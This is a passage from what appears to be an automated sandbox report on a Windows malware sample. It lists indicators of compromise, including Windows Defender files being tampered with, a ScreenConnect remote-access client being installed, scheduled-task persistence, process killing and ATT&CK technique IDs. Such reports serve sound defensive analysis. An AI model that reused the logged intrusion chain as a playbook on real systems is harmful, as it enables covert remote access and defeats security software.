File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl	cmd.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.Client.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\system.config	msiexec.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\app.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\Client.Override.en-US.resources	msiexec.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui	cmd.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsBackstageShell.exe	msiexec.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsClient.exe	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsFileManager.exe.config	msiexec.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\shellext.dll.mui	cmd.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsBackstageShell.exe.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\Client.en-US.resources	msiexec.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl	cmd.exe

Drops file in Windows directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\EstateLegislative	7IIl2eE.exe
File opened for modification	C:\Windows\ThoseTransit	WLbfHbp.exe
File opened for modification	C:\Windows\SinghCooling	WLbfHbp.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\ThoseTransit	WLbfHbp.exe
File opened for modification	C:\Windows\LogisticsNotre	7IIl2eE.exe
File opened for modification	C:\Windows\RowTopics	7IIl2eE.exe
File opened for modification	C:\Windows\VeryBulk	TbV75ZR.exe
File opened for modification	C:\Windows\Installer\MSI5D8E.tmp	msiexec.exe
File opened for modification	C:\Windows\EnglandDeleted	7IIl2eE.exe
File opened for modification	C:\Windows\FinancingPortable	TbV75ZR.exe
File opened for modification	C:\Windows\ProvidingMilwaukee	7IIl2eE.exe
File opened for modification	C:\Windows\ThinksMartin	TbV75ZR.exe
File opened for modification	C:\Windows\LogisticsNotre	7IIl2eE.exe
File opened for modification	C:\Windows\ProvidingMilwaukee	7IIl2eE.exe
File opened for modification	C:\Windows\EstateLegislative	7IIl2eE.exe
File opened for modification	C:\Windows\PotteryUser	7IIl2eE.exe
File opened for modification	C:\Windows\FinancingPortable	TbV75ZR.exe
File opened for modification	C:\Windows\IstRepresentative	TbV75ZR.exe
File opened for modification	C:\Windows\Installer\e585a6f.msi	msiexec.exe
File opened for modification	C:\Windows\DiscussedFacial	7IIl2eE.exe
File opened for modification	C:\Windows\IstRepresentative	TbV75ZR.exe
File opened for modification	C:\Windows\ThinksMartin	TbV75ZR.exe
File opened for modification	C:\Windows\Installer\MSI5BD8.tmp	msiexec.exe
File opened for modification	C:\Windows\BrandonStat	7IIl2eE.exe
File opened for modification	C:\Windows\SinghCooling	WLbfHbp.exe
File opened for modification	C:\Windows\DiscussedFacial	7IIl2eE.exe
File opened for modification	C:\Windows\MandateFlashing	TbV75ZR.exe
File opened for modification	C:\Windows\RowTopics	7IIl2eE.exe
File opened for modification	C:\Windows\IstRepresentative	WLbfHbp.exe
File opened for modification	C:\Windows\ThoseTransit	TbV75ZR.exe
File opened for modification	C:\Windows\IstRepresentative	WLbfHbp.exe
File opened for modification	C:\Windows\AdministratorNhs	WLbfHbp.exe
File created	C:\Windows\Installer\e585a71.msi	msiexec.exe
File opened for modification	C:\Windows\EnglandDeleted	7IIl2eE.exe
File opened for modification	C:\Windows\AdministratorNhs	TbV75ZR.exe
File opened for modification	C:\Windows\DollStriking	WLbfHbp.exe
File opened for modification	C:\Windows\VeryBulk	TbV75ZR.exe
File opened for modification	C:\Windows\CorrectionsGeographic	7IIl2eE.exe
File opened for modification	C:\Windows\SpecificsHeaven	7IIl2eE.exe
File opened for modification	C:\Windows\ThoseTransit	TbV75ZR.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\SpecificsHeaven	7IIl2eE.exe
File opened for modification	C:\Windows\AdministratorNhs	TbV75ZR.exe
File opened for modification	C:\Windows\JenniferSubdivision	7IIl2eE.exe
File opened for modification	C:\Windows\JenniferSubdivision	7IIl2eE.exe
File opened for modification	C:\Windows\FinancingPortable	WLbfHbp.exe
File opened for modification	C:\Windows\SinghCooling	TbV75ZR.exe
File created	C:\Windows\Installer\e585a6f.msi	msiexec.exe
File opened for modification	C:\Windows\WallpapersHo	7IIl2eE.exe
File opened for modification	C:\Windows\GentleLogging	7IIl2eE.exe
File opened for modification	C:\Windows\VeryBulk	WLbfHbp.exe
File opened for modification	C:\Windows\BrandonStat	7IIl2eE.exe
File opened for modification	C:\Windows\DollStriking	TbV75ZR.exe
File opened for modification	C:\Windows\FinancingPortable	WLbfHbp.exe
File opened for modification	C:\Windows\AdministratorNhs	WLbfHbp.exe
File opened for modification	C:\Windows\Installer\MSI5BA8.tmp	msiexec.exe
File created	C:\Windows\Installer\{F2D9E338-36BD-B769-CD92-1C2995F4239A}\DefaultIcon	msiexec.exe
File opened for modification	C:\Windows\DollStriking	TbV75ZR.exe
File opened for modification	C:\Windows\WallpapersHo	7IIl2eE.exe
File created	C:\Windows\Installer\wix{F2D9E338-36BD-B769-CD92-1C2995F4239A}.SchedServiceConfig.rmi	MsiExec.exe
File opened for modification	C:\Windows\Installer\{F2D9E338-36BD-B769-CD92-1C2995F4239A}\DefaultIcon	msiexec.exe
File opened for modification	C:\Windows\PotteryUser	7IIl2eE.exe

Launches sc.exe 38 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
12204	sc.exe
10576	sc.exe
9288	sc.exe
10928	sc.exe
11284	sc.exe
11336	sc.exe
11564	sc.exe
11240	sc.exe
11448	sc.exe
11020	sc.exe
10732	sc.exe
10636	sc.exe
6080	sc.exe
12068	sc.exe
12148	sc.exe
10504	sc.exe
11656	sc.exe
12768	sc.exe
11172	sc.exe
5788	sc.exe
12744	sc.exe
10896	sc.exe
11208	sc.exe
11684	sc.exe
11952	sc.exe
3904	sc.exe
11476	sc.exe
10988	sc.exe
9256	sc.exe
10784	sc.exe
11144	sc.exe
10668	sc.exe
9180	sc.exe
5816	sc.exe
11400	sc.exe
11528	sc.exe
11972	sc.exe
12048	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 2 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	46f39871.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	46f39871.exe

Program crash 4 IoCs

pid	pid_target	Process	procid_target
2224	12724	WerFault.exe	137
6664	13044	WerFault.exe	215
9952	6392	WerFault.exe	315
10740	208	WerFault.exe	329

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7IIl2eE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7IIl2eE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	14652926.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fontdrvhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BIm18E9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Exam.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TbV75ZR.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	apple.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fontdrvhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f5b76ee2f82d8dcc2dd274f1db28f32d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Temp70NWOJJ1DF300JLWXEBGPBTB9LOSXR64.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Exam.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	46f39871.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	11.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f73ae_003.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe

Checks SCSI registry key(s) 3 TTPs 5 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 000000000400000011e57f2869906d450000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff00000000270101000008000011e57f280000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff00000000070001000068090011e57f28000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d11e57f28000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff00000000000000000000000011e57f2800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	ScreenConnect.WindowsClient.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	ScreenConnect.WindowsClient.exe

Delays execution with timeout.exe 2 IoCs

defense_evasion

pid	Process
10600	timeout.exe
11304	timeout.exe

Kills process with taskkill 5 IoCs

defense_evasion

pid	Process
8380	taskkill.exe
8200	taskkill.exe
9332	taskkill.exe
9508	taskkill.exe
9748	taskkill.exe

Modifies data under HKEY_USERS 13 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	ScreenConnect.ClientService.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27	msiexec.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	ScreenConnect.ClientService.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\27\52C64B7E	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.WindowsClient.exe

Modifies registry class 37 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-C7A7-316889DB6DBE}\ = "ScreenConnect Client (f63a82ffaf9f93d1) Credential Provider"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\PackageCode = "833E9D2FDB63967BDC29C192594F32A9"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\Version = "402915332"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5B15089AFED232366FA328FFFAF9391D\833E9D2FDB63967BDC29C192594F32A9	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\SourceList\Media\1 = ";"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1\URL Protocol	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-C7A7-316889DB6DBE}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (f63a82ffaf9f93d1)\\ScreenConnect.WindowsCredentialProvider.dll"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\Assignment = "1"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5B15089AFED232366FA328FFFAF9391D	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\SourceList\Net	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-C7A7-316889DB6DBE}	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-C7A7-316889DB6DBE}\InprocServer32	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\ProductIcon = "C:\\Windows\\Installer\\{F2D9E338-36BD-B769-CD92-1C2995F4239A}\\DefaultIcon"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\SourceList	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\sc-f63a82ffaf9f93d1	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\sc-f63a82ffaf9f93d1\shell\open\command	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\SourceList\Media	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\Clients = 3a0000000000	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1\UseOriginalUrlEncoding = "1"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-C7A7-316889DB6DBE}\InprocServer32\ThreadingModel = "Apartment"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\833E9D2FDB63967BDC29C192594F32A9	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\ProductName = "ScreenConnect Client (f63a82ffaf9f93d1)"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\Language = "1033"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.4.4.9118\\f63a82ffaf9f93d1\\"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1\shell\open	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1\shell\open\command	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\833E9D2FDB63967BDC29C192594F32A9\Full	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\DeploymentFlags = "3"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\SourceList\PackageName = "ScreenConnect.ClientSetup.msi"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1\shell	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (f63a82ffaf9f93d1)\\ScreenConnect.WindowsClient.exe\" \"%1\""	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\AdvertiseFlags = "388"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\InstanceType = "0"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\AuthorizedLUAApp = "0"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.4.4.9118\\f63a82ffaf9f93d1\\"	msiexec.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
9156	schtasks.exe
7952	schtasks.exe
2088	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5296	powershell.exe
5296	powershell.exe
4392	Temp70NWOJJ1DF300JLWXEBGPBTB9LOSXR64.EXE
4392	Temp70NWOJJ1DF300JLWXEBGPBTB9LOSXR64.EXE
1244	rapes.exe
1244	rapes.exe
3404	powershell.exe
